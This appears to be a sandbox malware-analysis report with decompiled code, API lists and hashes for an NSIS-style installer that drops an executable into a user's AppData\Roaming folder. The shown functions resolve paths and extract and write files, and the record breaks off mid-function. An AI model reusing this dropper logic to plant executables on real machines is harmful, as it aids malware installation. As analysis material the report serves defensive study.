                            			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x433edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                            0x0040657a
                            0x0040657a
                            0x0040657a
                            0x00406580
                            0x00406585
                            0x00406596
                            0x00406596
                            0x0040659e
                            0x0040659f
                            0x004065a0
                            0x004065a1
                            0x004065a4
                            0x004065ac
                            0x004065ae
                            0x004065bf
                            0x004065c2
                            0x004065c2
                            0x004065c6
                            0x004065cc
                            0x004065cf
                            0x004067aa
                            0x004067aa
                            0x004067b5
                            0x004067c1
                            0x004067c1
                            0x00000000
                            0x004065d5
                            0x004065da
                            0x004065ef
                            0x004065f0
                            0x004065f6
                            0x00406788
                            0x00406796
                            0x00406799
                            0x00406799
                            0x0040678a
                            0x0040678d
                            0x00406790
                            0x00406792
                            0x00406792
                            0x0040679b
                            0x0040679b
                            0x004067a1
                            0x004067a4
                            0x004065d7
                            0x00000000
                            0x004065d7
                            0x00000000
                            0x004067a4
                            0x004065fc
                            0x004065ff
                            0x0040660e
                            0x00406615
                            0x00406621
                            0x00406624
                            0x00406627
                            0x00406628
                            0x0040662d
                            0x00406633
                            0x00406636
                            0x00406639
                            0x0040672c
                            0x00406731
                            0x00406764
                            0x00406769
                            0x0040676e
                            0x00406773
                            0x00406773
                            0x00406778
                            0x0040677e
                            0x00406781
                            0x00000000
                            0x00406781
                            0x00406733
                            0x00406736
                            0x00406739
                            0x0040674e
                            0x00406755
                            0x0040673b
                            0x00406742
                            0x00406742
                            0x0040675d
                            0x00406760
                            0x00406724
                            0x00406725
                            0x00406725
                            0x00000000
                            0x00406760
                            0x00406646
                            0x0040664a
                            0x0040664a
                            0x0040664b
                            0x0040664d
                            0x0040668a
                            0x0040668d
                            0x0040669d
                            0x004066a0
                            0x004066a8
                            0x004066ae
                            0x004066ae
                            0x00406709
                            0x00406709
                            0x0040670b
                            0x00000000
                            0x00000000
                            0x004066b2
                            0x004066b7
                            0x004066b8
                            0x004066ba
                            0x004066d1
                            0x004066df
                            0x004066e5
                            0x004066e7
                            0x00406705
                            0x00406705
                            0x00406705
                            0x00000000
                            0x00406705
                            0x004066ed
                            0x004066f6
                            0x004066f9
                            0x004066ff
                            0x00406703
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406703
                            0x004066cb
                            0x004066cd
                            0x004066cf
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004066cf
                            0x00000000
                            0x00406709
                            0x00406695
                            0x00000000
                            0x0040664f
                            0x0040666d
                            0x00406676
                            0x00406713
                            0x00406717
                            0x0040671f
                            0x0040671f
                            0x00000000
                            0x00406717
                            0x00406680
                            0x0040670d
                            0x00406711
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406711
                            0x0040664d
                            0x00000000
                            0x004065da

                            APIs
                            • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000400), ref: 00406695
                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,76CDEA30), ref: 004066A8
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Directory$SystemWindowslstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Roaming\34432.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 4260037668-3546267139
                            • Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                            • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                            • Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                            • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 339 4032b4-4032cb 340 4032d4-4032dd 339->340 341 4032cd 339->341 342 4032e6-4032eb 340->342 343 4032df 340->343 341->340 344 4032fb-403308 call 4034cf 342->344 345 4032ed-4032f6 call 4034e5 342->345 343->342 349 4034bd 344->349 350 40330e-403312 344->350 345->344 351 4034bf-4034c0 349->351 352 403468-40346a 350->352 353 403318-403361 GetTickCount 350->353 356 4034c8-4034cc 351->356 354 4034aa-4034ad 352->354 355 40346c-40346f 352->355 357 4034c5 353->357 358 403367-40336f 353->358 359 4034b2-4034bb call 4034cf 354->359 360 4034af 354->360 355->357 361 403471 355->361 357->356 362 403371 358->362 363 403374-403382 call 4034cf 358->363 359->349 372 4034c2 359->372 360->359 365 403474-40347a 361->365 362->363 363->349 371 403388-403391 363->371 369 40347c 365->369 370 40347e-40348c call 4034cf 365->370 369->370 370->349 376 40348e-40349a call 4060df 370->376 374 403397-4033b7 call 406a65 371->374 372->357 381 403460-403462 374->381 382 4033bd-4033d0 GetTickCount 374->382 383 403464-403466 376->383 384 40349c-4034a6 376->384 381->351 385 4033d2-4033da 382->385 386 40341b-40341d 382->386 383->351 384->365 387 4034a8 384->387 388 4033e2-403418 MulDiv wsprintfW call 40559f 385->388 389 4033dc-4033e0 385->389 390 403454-403458 386->390 391 40341f-403423 386->391 387->357 388->386 389->386 389->388 390->358 392 40345e 390->392 394 403425-40342c call 4060df 391->394 395 40343a-403445 391->395 392->357 400 403431-403433 394->400 396 403448-40344c 395->396 396->374 399 403452 396->399 399->357 400->383 401 403435-403438 400->401 401->396
                            C-Code - Quality: 95%
                            			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t101 =  *0x40ce60 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 =  *0x40ce60;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}























                            0x004032bf
                            0x004032c3
                            0x004032c6
                            0x004032cb
                            0x004032cd
                            0x004032cd
                            0x004032d4
                            0x004032d8
                            0x004032dd
                            0x004032df
                            0x004032df
                            0x004032e6
                            0x004032eb
                            0x004032f6
                            0x004032f6
                            0x00403308
                            0x004034bd
                            0x004034bd
                            0x00000000
                            0x0040330e
                            0x00403312
                            0x0040346a
                            0x004034ad
                            0x004034af
                            0x004034af
                            0x004034bb
                            0x004034c2
                            0x004034c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004034bb
                            0x0040346f
                            0x00000000
                            0x00000000
                            0x00403471
                            0x00403474
                            0x00403477
                            0x0040347a
                            0x0040347c
                            0x0040347c
                            0x0040348c
                            0x00000000
                            0x00000000
                            0x0040349a
                            0x00403464
                            0x00403464
                            0x004034bf
                            0x004034bf
                            0x00000000
                            0x004034bf
                            0x0040349c
                            0x0040349f
                            0x004034a6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004034a8
                            0x00000000
                            0x00403474
                            0x0040331e
                            0x00403320
                            0x00403327
                            0x0040332e
                            0x0040332e
                            0x00403335
                            0x0040333d
                            0x00403347
                            0x0040334c
                            0x00403354
                            0x0040335e
                            0x00403361
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403367
                            0x00403367
                            0x00403367
                            0x0040336f
                            0x00403371
                            0x00403371
                            0x00403382
                            0x00000000
                            0x00000000
                            0x00403388
                            0x0040338b
                            0x00403391
                            0x00403397
                            0x00403397
                            0x004033a2
                            0x004033a8
                            0x004033ad
                            0x004033b4
                            0x004033b7
                            0x00000000
                            0x00000000
                            0x004033c3
                            0x004033c5
                            0x004033ce
                            0x004033d0
                            0x00403401
                            0x00403407
                            0x00403413
                            0x00403418
                            0x00403418
                            0x0040341d
                            0x00403458
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040341f
                            0x00403423
                            0x0040343f
                            0x00403442
                            0x00403445
                            0x00403448
                            0x0040344c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403452
                            0x0040342c
                            0x00403433
                            0x00000000
                            0x00000000
                            0x00403435
                            0x00000000
                            0x00403435
                            0x0040341d
                            0x00403460
                            0x00000000
                            0x00403460
                            0x00000000
                            0x00403367

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CountTick$wsprintf
                            • String ID: *B$ A$ A$... %d%%$}8@
                            • API String ID: 551687249-3029848762
                            • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                            • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                            • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                            • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 402 40176f-401794 call 402da6 call 405e83 407 401796-40179c call 40653d 402->407 408 40179e-4017b0 call 40653d call 405e0c lstrcatW 402->408 413 4017b5-4017b6 call 4067c4 407->413 408->413 417 4017bb-4017bf 413->417 418 4017c1-4017cb call 406873 417->418 419 4017f2-4017f5 417->419 426 4017dd-4017ef 418->426 427 4017cd-4017db CompareFileTime 418->427 420 4017f7-4017f8 call 406008 419->420 421 4017fd-401819 call 40602d 419->421 420->421 429 40181b-40181e 421->429 430 40188d-4018b6 call 40559f call 4032b4 421->430 426->419 427->426 431 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 429->431 432 40186f-401879 call 40559f 429->432 442 4018b8-4018bc 430->442 443 4018be-4018ca SetFileTime 430->443 431->417 464 401864-401865 431->464 444 401882-401888 432->444 442->443 446 4018d0-4018db FindCloseChangeNotification 442->446 443->446 447 402c33 444->447 450 4018e1-4018e4 446->450 451 402c2a-402c2d 446->451 452 402c35-402c39 447->452 454 4018e6-4018f7 call 40657a lstrcatW 450->454 455 4018f9-4018fc call 40657a 450->455 451->447 461 401901-4023a2 call 405b9d 454->461 455->461 461->451 461->452 464->444 466 401867-401868 464->466 466->432
                            C-Code - Quality: 75%
                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\Users";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D(0x40b5f0, _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\jones\AppData\Roaming",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, 0x40b5f0);
						_t64 = E00405B9D("C:\Users\jones\AppData\Roaming",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8));
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}


















                            0x0040176f
                            0x00401776
                            0x00401782
                            0x00401785
                            0x0040178a
                            0x0040178d
                            0x00401794
                            0x004017b0
                            0x00401796
                            0x00401797
                            0x00401797
                            0x004017b6
                            0x004017bb
                            0x004017bb
                            0x004017bf
                            0x004017c2
                            0x004017c7
                            0x004017c9
                            0x004017cb
                            0x004017d0
                            0x004017d0
                            0x004017db
                            0x004017db
                            0x004017ec
                            0x004017ee
                            0x004017ee
                            0x004017ef
                            0x004017ef
                            0x004017f2
                            0x004017f5
                            0x004017f8
                            0x004017f8
                            0x004017ff
                            0x0040180e
                            0x00401813
                            0x00401816
                            0x00401819
                            0x00000000
                            0x00000000
                            0x0040181b
                            0x0040181e
                            0x00401874
                            0x00401879
                            0x004015b6
                            0x0040292e
                            0x0040292e
                            0x00402c2a
                            0x00402c2d
                            0x00402c2d
                            0x00000000
                            0x00401820
                            0x00401826
                            0x0040182d
                            0x0040183a
                            0x00401845
                            0x0040185b
                            0x0040185b
                            0x0040185e
                            0x00000000
                            0x00401864
                            0x00401864
                            0x00401865
                            0x00401882
                            0x00402c33
                            0x00402c33
                            0x00402c33
                            0x00401867
                            0x00401867
                            0x00401868
                            0x00401493
                            0x0040239d
                            0x0040239d
                            0x0040239d
                            0x00401865
                            0x0040185e
                            0x00402c35
                            0x00402c39
                            0x00402c39
                            0x00401892
                            0x00401897
                            0x004018a5
                            0x004018aa
                            0x004018b0
                            0x004018b4
                            0x004018b6
                            0x004018be
                            0x004018ca
                            0x004018b8
                            0x004018b8
                            0x004018bc
                            0x00000000
                            0x00000000
                            0x004018bc
                            0x004018d3
                            0x004018d9
                            0x004018db
                            0x00000000
                            0x004018e1
                            0x004018e1
                            0x004018e4
                            0x004018fc
                            0x004018e6
                            0x004018e9
                            0x004018f2
                            0x004018f2
                            0x00401901
                            0x00401906
                            0x00402398
                            0x00000000
                            0x00402398
                            0x00000000

                            APIs
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\34432.exe,C:\Users\user\AppData\Roaming\34432.exe,00000000,00000000,C:\Users\user\AppData\Roaming\34432.exe,00441000,?,?,00000031), ref: 004017D5
                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                              • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID: C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\34432.exe
                            • API String ID: 1941528284-1523479004
                            • Opcode ID: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                            • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                            • Opcode Fuzzy Hash: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                            • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 468 40689a-4068ba GetSystemDirectoryW 469 4068bc 468->469 470 4068be-4068c0 468->470 469->470 471 4068d1-4068d3 470->471 472 4068c2-4068cb 470->472 474 4068d4-406907 wsprintfW LoadLibraryExW 471->474 472->471 473 4068cd-4068cf 472->473 473->474
                            C-Code - Quality: 100%
                            			E0040689A(intOrPtr _a4) {
